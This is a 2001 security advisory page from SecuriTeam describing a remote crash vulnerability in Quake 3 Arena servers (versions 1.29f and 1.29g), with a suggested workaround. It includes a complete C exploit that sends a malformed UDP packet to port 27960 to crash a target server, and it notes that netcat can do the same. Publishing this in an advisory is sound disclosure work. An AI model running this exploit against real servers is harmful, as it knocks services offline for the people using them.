Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Quake 3 Arena Security Vulnerability (CHAR 255, Exploit) 2 Aug. 2001    Summary Quake 3 Arena allows gamers among to fight each others in virtual arenas created for the Quake game. This application contains a vulnerability that allows attackers to crash the server remotely.   Credit: The information has been provided by The Tree of Life and defrag. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable systems: Quake 3 Arena version 1.29f Quake 3 Arena version 1.29g Immune systems: Quake 3 Arena version 1.17 A security vulnerability has been found in Quake 3 Arena. The vulnerability allows an attacker to cause the server to crash. The vulnerability can be reproduced by initiating a connection to the server and then sending the following sequence: ????connectre Where those four strange character (Y with the dots on them) are char(255)'s. Temporary solution: A quick way to ensure that your server will be up is to revert back to version 1.17. Exploit: /* This is a 1.29f and 1.29g Server Exploit for id software's Quake3: Arena. Basically this connects to the default port 27960 of a server and sends a udp packet with a string of Char(255) four times plus connect, all as one word. This is a working Linux version, simple enough to use: ./fuq3 <hostname> I am no way going to continue to work on this it works it has done. It is proven. Therefore, here is the bare minimum. Thanks to ttol and his information, this was achieved. There is also a working hack that can be done with netcat, you use netcat with the -u (UDP option) connect to the host, and then you send the string. */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdio.h> #define PORTNUMBER 27960 /* change this value to the port desired */ main (argc, argv) int argc; char *argv[]; {     int socketDesc;     struct sockaddr_in destinationAddr;     struct hostent *hostAddrPtr;     char *msgBufPtr = "????connectre";     if ((socketDesc = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {         perror("open error on socket");         exit(1);     }     if ((hostAddrPtr = gethostbyname(argv[1])) == 0) {         printf("Could not get address of %s\n",argv[1]);         exit(1);     }     destinationAddr.sin_family = AF_INET;     memcpy((char *) &destinationAddr.sin_addr.s_addr,            (char *) hostAddrPtr->h_addr, hostAddrPtr-> h_length);     destinationAddr.sin_port = htons(PORTNUMBER);     /* send message to socket */     if (sendto(socketDesc, msgBufPtr, strlen(msgBufPtr)+1, 0,            (struct sockaddr *)&destinationAddr, sizeof(destinationAddr)) 0) {         perror("socket send error");         exit(1);     }     printf("Seg Fault on %s...\n",argv[1]); }  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®